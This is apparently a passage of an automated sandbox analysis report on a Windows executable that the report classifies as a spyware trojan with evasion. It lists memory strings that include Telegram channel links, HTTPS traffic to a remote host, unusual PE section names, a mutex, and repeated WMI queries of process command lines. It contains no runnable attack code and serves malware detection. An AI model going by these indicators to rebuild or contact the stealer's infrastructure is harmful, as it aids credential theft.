Source: chrome.exe, 00000006.00000002.1447886253.000017D4008D8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1325014913.000017D40111C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1473108902.000017D401308000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1472286042.000017D401120000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1473341101.000017D40137C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/?usp=installed_webapp
Source: chrome.exe, 00000006.00000002.1472693291.000017D401204000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1447886253.000017D4008D8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/J
Source: chrome.exe, 00000006.00000002.1447886253.000017D4008D8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1472799030.000017D401244000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_default
Source: chrome.exe, 00000006.00000002.1461564252.000017D400E14000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://metro.co.uk
Source: chrome.exe, 00000006.00000002.1451644719.000017D400C4C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1449820356.000017D400ACC000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1475869923.000017D401770000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/?utm_source=ga-chrome-actions&utm_medium=manageGA
Source: chrome.exe, 00000006.00000002.1472463173.000017D401188000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1451868980.000017D400CD8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacy
Source: chrome.exe, 00000006.00000002.1449265762.000017D400A04000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1472463173.000017D401188000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1451868980.000017D400CD8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhone
Source: chrome.exe, 00000006.00000002.1442304117.000017D000630000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1310480783.000017D000404000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/shielded-email?utm_source=chrome2B
Source: chrome.exe, 00000006.00000002.1449265762.000017D400A04000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1472463173.000017D401188000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1451868980.000017D400CD8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/signinoptions/password?utm_source=ga-chrome-actions&utm_medium=changePW
Source: chrome.exe, 00000006.00000002.1451544166.000017D400C1C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1472637663.000017D4011E8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://myactivity.google.com/
Source: chrome.exe, 00000006.00000002.1461564252.000017D400E14000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://nexxen.tech
Source: chrome.exe, 00000006.00000002.1443610535.000017D400223000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://oauthaccountmanager.googleapis.com/
Source: chrome.exe, 00000006.00000002.1443610535.000017D400223000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://oauthaccountmanager.googleapis.com/v1/issuetoken
Source: chrome.exe, 00000006.00000002.1472606414.000017D4011D8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://ogs.google.com
Source: chrome.exe, 00000006.00000002.1461564252.000017D400E14000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://open-bid.com
Source: chrome.exe, 00000006.00000002.1473782604.000017D401490000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1471690790.000017D400FB8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1473403882.000017D4013AD000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1&target=OPTIMIZATION_TARGET_PAGE_TOPICS_
Source: chrome.exe, 00000006.00000002.1473782604.000017D401490000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1473403882.000017D4013AD000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1473815592.000017D4014A0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1473719651.000017D401464000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1673999601&target=OPTIMIZATION_TARGET_PAG
Source: chrome.exe, 00000006.00000002.1473782604.000017D401490000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1473403882.000017D4013AD000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1473815592.000017D4014A0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1325208619.000017D401484000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1678906374&target=OPTIMIZATION_TARGET_OMN
Source: chrome.exe, 00000006.00000002.1473782604.000017D401490000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1473403882.000017D4013AD000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1679317318&target=OPTIMIZATION_TARGET_LAN
Source: chrome.exe, 00000006.00000002.1473782604.000017D401490000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1473403882.000017D4013AD000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1325208619.000017D401484000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049402&target=OPTIMIZATION_TARGET_GEO
Source: chrome.exe, 00000006.00000002.1473782604.000017D401490000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1473403882.000017D4013AD000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1472183552.000017D4010DC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049414&target=OPTIMIZATION_TARGET_NOT
Source: chrome.exe, 00000006.00000002.1473782604.000017D401490000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1471690790.000017D400FB8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1473403882.000017D4013AD000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695051229&target=OPTIMIZATION_TARGET_PAG
Source: chrome.exe, 00000006.00000002.1471690790.000017D400FB8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1473403882.000017D4013AD000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1473815592.000017D4014A0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1325208619.000017D401484000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1473719651.000017D401464000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=210230727&target=OPTIMIZATION_TARGET_CLIE
Source: chrome.exe, 00000006.00000002.1443610535.000017D400223000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/v1:GetHints
Source: chrome.exe, 00000006.00000002.1444955697.000017D4005A4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1474306449.000017D401570000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1474336202.000017D4015A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://outlook.office.com/calendar/
Source: chrome.exe, 00000006.00000002.1408070259.0000025707AD0000.00000002.00000001.00040000.00000010.sdmp	String found in binary or memory: https://passwords.google.comSaved
Source: chrome.exe, 00000006.00000002.1449034116.000017D4009B8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://passwords.google/
Source: chrome.exe, 00000006.00000002.1443610535.000017D400223000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://people.googleapis.com/
Source: chrome.exe, 00000006.00000002.1408070259.0000025707AD0000.00000002.00000001.00040000.00000010.sdmp, chrome.exe, 00000006.00000002.1451801744.000017D400CC4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1451544166.000017D400C1C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1472637663.000017D4011E8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://policies.google.com/
Source: chrome.exe, 00000006.00000002.1461564252.000017D400E14000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://postrelease.com
Source: chrome.exe, 00000006.00000002.1445848669.000017D4007D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
Source: chrome.exe, 00000006.00000002.1445612446.000017D400740000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
Source: chrome.exe, 00000006.00000002.1444442982.000017D40047C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditing
Source: chrome.exe, 00000006.00000002.1461564252.000017D400E14000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://samplicio.us
Source: chrome.exe, 00000006.00000002.1443070857.000017D400140000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1442815354.000017D4000B4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://sctauditing-pa.googleapis.com/v1/knownscts/length/$1/prefix/$2?key=AIzaSyA2KlwBX3mkFo30om9LU
Source: chrome.exe, 00000006.00000002.1461564252.000017D400E14000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1443610535.000017D400223000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://securitydomain-pa.googleapis.com/v1/
Source: chrome.exe, 00000006.00000002.1461564252.000017D400E14000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://semafor.com
Source: chrome.exe, 00000006.00000002.1461564252.000017D400E14000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://shared-storage-demo-publisher-a.web.app
Source: chrome.exe, 00000006.00000002.1442304117.000017D000630000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1310480783.000017D000404000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://shieldedids-pa.googleapis.comb
Source: chrome.exe, 00000006.00000002.1453899591.000017D400D78000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1475680789.000017D40175C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1450718698.000017D400BE4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000006.00000002.1408070259.0000025707AD0000.00000002.00000001.00040000.00000010.sdmp	String found in binary or memory: https://support.google.com/chrome/a/?p=browser_profile_details
Source: chrome.exe, 00000006.00000002.1408070259.0000025707AD0000.00000002.00000001.00040000.00000010.sdmp	String found in binary or memory: https://support.google.com/chrome/answer/6098869
Source: chrome.exe, 00000006.00000002.1408070259.0000025707AD0000.00000002.00000001.00040000.00000010.sdmp	String found in binary or memory: https://support.google.com/chrome/answer/96817
Source: chrome.exe, 00000006.00000002.1444955697.000017D4005D4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://support.google.com/chrome?p=desktop_tab_groups
Source: chrome.exe, 00000006.00000002.1408070259.0000025707AD0000.00000002.00000001.00040000.00000010.sdmp	String found in binary or memory: https://support.google.com/chromebook?p=app_intent
Source: R9rwNLVzpr.exe, 00000001.00000002.1584357920.000000000386A000.00000004.00000800.00020000.00000000.sdmp, R9rwNLVzpr.exe, 00000001.00000002.1584357920.000000000342E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://t.me/
Source: R9rwNLVzpr.exe, 00000001.00000002.1584357920.00000000036C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://t.me/TheDyer
Source: R9rwNLVzpr.exe, 00000001.00000002.1584357920.000000000386A000.00000004.00000800.00020000.00000000.sdmp, R9rwNLVzpr.exe, 00000001.00000002.1584357920.000000000342E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://t.me/freakcodingspot
Source: R9rwNLVzpr.exe, 00000001.00000002.1584357920.00000000036C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://t.me/webster480
Source: chrome.exe, 00000006.00000002.1461564252.000017D400E14000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://t0.gstatic.com/faviconV2
Source: chrome.exe, 00000006.00000002.1461564252.000017D400E14000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://taboola.com
Source: chrome.exe, 00000006.00000002.1443610535.000017D400223000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://tasks.googleapis.com/
Source: chrome.exe, 00000006.00000002.1461564252.000017D400E14000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://torneos.gg
Source: chrome.exe, 00000006.00000002.1458369665.000017D400DE8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/v20
Source: chrome.exe, 00000006.00000002.1471554093.000017D400F2C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: chrome.exe, 00000006.00000002.1444690428.000017D4004E0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1472637663.000017D4011E8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1448490770.000017D4008EC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/
Source: chrome.exe, 00000006.00000002.1474821671.000017D401624000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/async/ddljson?async=ntp:2
Source: chrome.exe, 00000006.00000002.1475571259.000017D40174C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1476893883.000017D401854000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
Source: chrome.exe, 00000006.00000002.1433264939.0000025708DA7000.00000004.10000000.00040000.00000000.sdmp, chrome.exe, 00000006.00000002.1443610535.000017D400223000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/async/newtab_promos
Source: chrome.exe, 00000006.00000002.1449034116.000017D4009B8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/#safe
Source: chrome.exe, 00000006.00000002.1449265762.000017D400A04000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/browser-features/
Source: chrome.exe, 00000006.00000002.1449265762.000017D400A04000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/browser-tools/
Source: chrome.exe, 00000006.00000002.1442304117.000017D000630000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1310480783.000017D000404000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/go-mobile/?ios-campaign=desktop-chr-ntp&android-campaign=desktop-chr-n
Source: chrome.exe, 00000006.00000002.1408070259.0000025707AD0000.00000002.00000001.00040000.00000010.sdmp	String found in binary or memory: https://www.google.com/chrome/privacy/eula_text.htmlH&elpManaged
Source: chrome.exe, 00000006.00000002.1450386543.000017D400BB4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1448714179.000017D400928000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1451868980.000017D400CD8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/tips/
Source: chrome.exe, 00000006.00000002.1471284495.000017D400E54000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=
Source: chrome.exe, 00000006.00000002.1472799030.000017D401244000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1446905028.000017D400815000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1444955697.000017D4005D4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1471893974.000017D401014000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
Source: chrome.exe, 00000006.00000002.1442304117.000017D000630000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1310480783.000017D000404000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search
Source: chrome.exe, 00000006.00000002.1444412649.000017D400469000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/tools/feedback/chrome/__submit
Source: chrome.exe, 00000006.00000002.1443610535.000017D400223000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/
Source: chrome.exe, 00000006.00000002.1442304117.000017D000630000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1310480783.000017D000404000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager2
Source: chrome.exe, 00000006.00000002.1443610535.000017D400223000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/oauth2/v1/userinfo
Source: chrome.exe, 00000006.00000002.1443610535.000017D400223000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/oauth2/v2/tokeninfo
Source: chrome.exe, 00000006.00000002.1443610535.000017D400223000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/oauth2/v4/token
Source: chrome.exe, 00000006.00000002.1471937234.000017D40108A000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1324535784.000017D40108C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1443610535.000017D400223000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/reauth/v1beta/users/
Source: chrome.exe, 00000006.00000002.1447086556.000017D400854000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/chrome/intelligence/assist/ranker/models/translate/2017/03/translate_ranker_
Source: chrome.exe, 00000006.00000002.1472912058.000017D401288000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1473108902.000017D401308000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/
Source: chrome.exe, 00000006.00000002.1447886253.000017D4008D8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/:
Source: chrome.exe, 00000006.00000002.1472912058.000017D401288000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1447886253.000017D4008D8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1473108902.000017D401308000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1473659400.000017D401438000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/?feature=ytca
Source: chrome.exe, 00000006.00000002.1447886253.000017D4008D8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/J
Source: chrome.exe, 00000006.00000002.1472912058.000017D401288000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/feature=ytca
Source: chrome.exe, 00000006.00000002.1447886253.000017D4008D8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1472799030.000017D401244000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html
Source: chrome.exe, 00000006.00000002.1461564252.000017D400E14000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://yieldlab.net

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49727 version: TLS 1.2

System Summary

PE file contains section with special chars

Source: R9rwNLVzpr.exe	Static PE information: section name: .:"%
Source: R9rwNLVzpr.exe	Static PE information: section name: .W!:

Source: C:\Users\user\Desktop\R9rwNLVzpr.exe

Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7924 -s 2604

Source: R9rwNLVzpr.exe, 00000001.00000000.1270332675.00000000010FA000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamesystem.exeH vs R9rwNLVzpr.exe
Source: R9rwNLVzpr.exe	Binary or memory string: OriginalFilenamesystem.exeH vs R9rwNLVzpr.exe

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@18/6@4/4

Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Mutant created: NULL
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Mutant created: \Sessions\1\BaseNamedObjects\Orajagohavurucutabimixoxatitova
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7924

Source: C:\Windows\System32\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\9a301f70-ac51-4598-a47d-1676fb5f518a

Jump to behavior

Source: R9rwNLVzpr.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.98%

Source: C:\Users\user\Desktop\R9rwNLVzpr.exe

System information queried: HandleInformation

Jump to behavior

Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1564
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5596
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5164
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4732
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7348
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 940
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7036
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5588
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6876
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 408
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3424
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 404
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3416
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7204
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6860
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2548
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3408
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7588
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5992
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7284
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7980
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2536
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6844
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7512
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6340
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6840
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3820
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3388
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1232
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2524
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6400
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 796
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7780
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4672
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7672
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 788
